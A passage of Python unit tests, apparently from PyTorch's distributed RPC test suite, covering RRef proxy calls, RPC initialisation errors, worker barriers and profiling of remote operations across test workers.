ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
